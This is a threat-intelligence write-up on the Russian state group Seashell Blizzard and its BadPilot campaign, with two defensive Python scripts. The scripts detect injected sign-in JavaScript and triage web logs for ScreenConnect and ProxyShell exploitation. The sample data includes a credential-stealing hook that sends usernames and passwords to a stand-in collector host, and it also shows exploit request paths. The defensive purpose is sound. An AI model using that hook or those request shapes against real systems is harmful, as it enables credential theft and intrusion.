Introduction

Seashell Blizzard [1] [2] [3] [4] [5] [6] [7] [8], also tracked as APT44 [2], is a Russian state-sponsored cyber group [8] that has conducted cyber-espionage and disruptive cyber-attacks on behalf of Russian military intelligence (GRU) Unit 74455 since at least 2000. The group has notably expanded its operations following Russia's 2022 invasion of Ukraine, targeting critical infrastructure sectors globally [1] [7].

Description

Russian state cyber-actor Seashell Blizzard [3], also known as APT44 [2], has been active since at least 2000 and operates on behalf of GRU Unit 74455 [3], the Main Center for Special Technologies (GTsST) [4]. Since at least 2021, a specialist initial access subgroup within Seashell Blizzard [3] has run what Microsoft tracks as the "BadPilot campaign", a multiyear effort to compromise Internet-facing infrastructure worldwide. Targeted sectors include energy, oil and gas [3] [5] [7] [8], telecommunications [3] [5] [7] [8], shipping [3] [5] [8], arms manufacturing [3] [5] [7] [8], national governments [2] [3] [5] [7] [8], retail [1], education [1], consulting [1] [2] [5], and agriculture [1].

Following Russia's invasion of Ukraine in 2022 [8], the campaign's geographic targeting has expanded beyond Ukraine and Eastern Europe to the UK, the US [1] [3] [8], Canada [3] [7] [8], and Australia [3] [7] [8], a broader operational scope aligned with Russian military objectives. The subgroup combines opportunistic initial access with stealthy persistence to collect credentials [2] [8], execute commands [1] [2] [7] [8], and move laterally [1] [2] [7] [8], which has resulted in significant compromises of regional networks [1] [2] [8].

To maintain long-term access, the subgroup has used web shells [2], including a custom web shell named LocalOlive [4], and, since early 2024 [1], has deployed legitimate remote management and monitoring (RMM) tools [2] such as Atera Agent and Splashtop Remote Services [5], whose traffic blends in with routine administration. It has also made malicious modifications to network resources [2], including Outlook Web Access (OWA) sign-in pages and DNS configurations [4], to passively collect network credentials. In the same vein, the subgroup has injected rogue JavaScript into legitimate sign-in portals to harvest usernames and passwords as they are entered [2].
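The sign-in page tampering described above is detectable by treating the page's scripts as an integrity-checked artifact: every `<script>` on the served page is compared against a known-good copy, and anything new is reported along with credential-theft indicators found in its body. The following is an added example, not code from Microsoft or from any of the cited reports; the OWA-like HTML, the injected hook and the collector URL are constructed for illustration, and the indicator strings are an assumption to tune per environment.

```python
"""Detect rogue JavaScript injected into a sign-in page (e.g. an OWA logon
page) by diffing the page's scripts against a known-good baseline.
Added example, not Microsoft's or the page's code. The sample HTML, the
collector endpoint and the indicator list are constructed assumptions."""
import hashlib
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Record every <script>: ("src", url) or ("inline", sha256, body)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append(("src", src.strip()))
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            body = "".join(self._buf).strip()
            digest = hashlib.sha256(body.encode("utf-8")).hexdigest()
            self.scripts.append(("inline", digest, body))
            self._in_inline = False


def extract_scripts(html):
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


# Strings typical of a credential-harvesting hook; a constructed list, extend to taste.
CREDENTIAL_INDICATORS = ("password", "fetch(", "XMLHttpRequest", "sendBeacon", "btoa(")


def find_rogue_scripts(baseline_html, current_html):
    """Return one finding per script present on the current page but absent
    from the baseline. Inline scripts are keyed by the SHA-256 of their body
    and external ones by src, so a one-byte edit to a legitimate script is
    reported too."""
    known = {entry[:2] for entry in extract_scripts(baseline_html)}
    findings = []
    for entry in extract_scripts(current_html):
        if entry[:2] in known:
            continue
        if entry[0] == "src":
            findings.append({"kind": "src", "detail": entry[1], "indicators": []})
        else:
            hits = [s for s in CREDENTIAL_INDICATORS if s in entry[2]]
            findings.append({"kind": "inline", "detail": entry[1][:16], "indicators": hits})
    return findings


# Constructed known-good logon page, loosely modelled on an OWA form.
BASELINE_HTML = """<html><head>
<script src="/owa/auth/15.2.1118.7/scripts/premium/flogon.js"></script>
<script>var a_fLgnCs = true;</script>
</head><body>
<form name="logonForm" action="/owa/auth.owa" method="post">
<input type="text" name="username"><input type="password" name="password">
<input type="submit" value="sign in"></form>
</body></html>"""

# The same page after a constructed credential-stealing hook was appended.
INJECTED_SCRIPT = """<script>
document.forms.logonForm.addEventListener("submit", function () {
  var u = document.getElementsByName("username")[0].value;
  var p = document.getElementsByName("password")[0].value;
  fetch("https://collect.example.invalid/c", {method: "POST", mode: "no-cors",
        body: btoa(u + ":" + p)});
});
</script>"""
MODIFIED_HTML = BASELINE_HTML.replace("</body>", INJECTED_SCRIPT + "\n</body>")

if __name__ == "__main__":
    for finding in find_rogue_scripts(BASELINE_HTML, MODIFIED_HTML):
        print(finding)
```

Run it against both the on-disk logon template and the page as served by the web front end, since the modification can live in either; a `src` finding that points at a path nobody recognizes is also a common place for a web shell or loader to hide. The DNS-side variant the reports mention needs a different control (alerting on changes to the zone records that resolve the sign-in host), which this script does not cover.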

Much of the campaign's access has come from exploiting vulnerabilities in remote access products, notably ConnectWise ScreenConnect (CVE-2024-1709, an authentication bypass) and Fortinet FortiClient EMS (CVE-2023-48788, an SQL injection) [4] [5] [7]. The subgroup has also targeted server software common to small office/home office (SOHO) and enterprise networks [4], including Microsoft Exchange (CVE-2021-34473, ProxyShell) [4] [5], Zimbra Collaboration (CVE-2022-41352) [4] [5], Openfire (CVE-2023-32315) [5], and JetBrains TeamCity (CVE-2023-42793) [5]. Microsoft threat researchers count at least eight such vulnerabilities in server infrastructure commonly used in small office and enterprise networks [7], all but one rated critical on the CVSS scale [7]; the subgroup tracks newly published CVEs and weaponizes them quickly to gain access to targets. Its operations reflect a "spray and pray" approach [7]: mass, largely untargeted exploitation of exposed systems that yields large-scale compromises with minimal tailored effort [7].

Notably, the subgroup has been linked to at least three destructive cyber attacks in Ukraine since 2023 [7] [8], underscoring the threat it poses to critical infrastructure organizations globally. As the campaign continues to develop scalable techniques for compromising networks, it remains aligned with Russia's war objectives and national priorities. The wider group's activities also encompass phishing campaigns, malware distribution [1], and supply chain attacks aimed at disrupting services and undermining confidence in the Ukrainian government.
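Several of the vulnerabilities listed above leave recognizable request shapes in web server logs, which makes retrospective triage cheap. The following is an added example, not code from Microsoft or from the cited reports: it scans constructed IIS-format (W3C) log lines for two of the publicly documented exploitation paths, the trailing slash on ScreenConnect's `SetupWizard.aspx` (CVE-2024-1709) and the `?@` path confusion in Exchange's `autodiscover.json` (CVE-2021-34473). The hosts, addresses and timestamps are invented sample data, and the log layout is assumed to be the default IIS field set.

```python
"""Triage IIS-style W3C web logs for the request shapes used to exploit two
of the CVEs named above. Added example, not Microsoft's or the page's code;
the log lines are constructed, and the patterns reflect the publicly
documented exploitation paths (ScreenConnect's trailing slash on
SetupWizard.aspx, Exchange's '?@' path confusion in autodiscover.json)."""
import re

# Rule name -> regex matched against the reconstructed request URL.
RULES = {
    "CVE-2024-1709 ScreenConnect setup-wizard auth bypass":
        re.compile(r"/SetupWizard\.aspx/", re.IGNORECASE),
    "CVE-2021-34473 Exchange ProxyShell path confusion":
        re.compile(r"/autodiscover/autodiscover\.json(?:\?|%3f)@", re.IGNORECASE),
}


def parse_w3c(lines):
    """Yield one dict per record, using the #Fields: header for column names."""
    fields = None
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):   # truncated or oddly spaced line; skip it
            continue
        yield dict(zip(fields, parts))


def triage(lines):
    """Return a hit for every record whose URL matches a rule."""
    hits = []
    for rec in parse_w3c(lines):
        url = rec["cs-uri-stem"]
        query = rec.get("cs-uri-query", "-")
        if query != "-":               # IIS logs '-' for an empty query string
            url += "?" + query
        for rule, rx in RULES.items():
            if rx.search(url):
                hits.append({
                    "rule": rule,
                    "when": rec["date"] + " " + rec["time"],
                    "src": rec["c-ip"],
                    "method": rec["cs-method"],
                    "url": url,
                    "status": rec["sc-status"],
                })
    return hits


# Constructed sample: a ScreenConnect host (10.0.0.5) and an Exchange host (10.0.0.9).
# Lines 3 and 4 are benign look-alikes: first-run setup with no trailing slash,
# and a normal Autodiscover v2 query whose '@' sits inside the Email parameter.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-02-20 10:15:03 10.0.0.5 GET /Login.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 31
2024-02-20 10:15:09 10.0.0.5 POST /SetupWizard.aspx/anything - 443 - 203.0.113.7 python-requests/2.31 - 200 0 0 118
2024-02-20 10:16:40 10.0.0.5 GET /SetupWizard.aspx - 443 - 10.0.0.23 Mozilla/5.0 - 302 0 0 4
2024-02-20 11:02:17 10.0.0.9 GET /autodiscover/autodiscover.json Email=jdoe@corp.example&Protocol=Ews 443 - 198.51.100.4 Outlook/16.0 - 200 0 0 15
2024-02-20 11:02:55 10.0.0.9 POST /autodiscover/autodiscover.json @corp.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@corp.example 443 - 203.0.113.7 python-requests/2.31 - 200 0 0 201
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG.splitlines()):
        print(hit["when"], hit["src"], hit["method"], hit["rule"], hit["url"])
```

A match is an exploitation attempt, not a confirmed compromise; what warrants pulling the host for review is a 200 on `SetupWizard.aspx/` from a ScreenConnect instance that was already configured, or a scripted user agent reaching the ProxyShell path. Add a rule each time a new CVE in this class is published, since the subgroup's pattern is to adopt them quickly.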

Conclusion

The activities of Seashell Blizzard, particularly through the BadPilot campaign, pose a significant threat to global cybersecurity, especially in critical infrastructure sectors [7]. The group’s ability to exploit vulnerabilities and maintain persistent access underscores the need for robust cybersecurity measures and international cooperation to mitigate these threats. As the geopolitical landscape evolves, the potential for further expansion of their operations remains a concern, necessitating continuous vigilance and adaptation of defensive strategies.

References

[1] https://www.techradar.com/pro/security/major-russian-hacking-group-shifts-focus-to-us-and-uk-targets
[2] https://informationsecuritybuzz.com/russia-linked-seashell-blizzard-intens/
[3] https://www.infosecurity-magazine.com/news/russian-seashell-blizzard-initial/
[4] https://securityaffairs.com/174173/apt/russia-linked-seashell-blizzard-apt-badpilot-op.html
[5] https://cybersecuritynews.com/badpilot-attacking-network-devices/
[6] https://www.cybersecurity-review.com/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/
[7] https://cyberscoop.com/russian-state-threat-group-shifts-focus/
[8] https://www.itpro.com/security/cyber-crime/seashell-blizzard-badpilot-hacking-campaign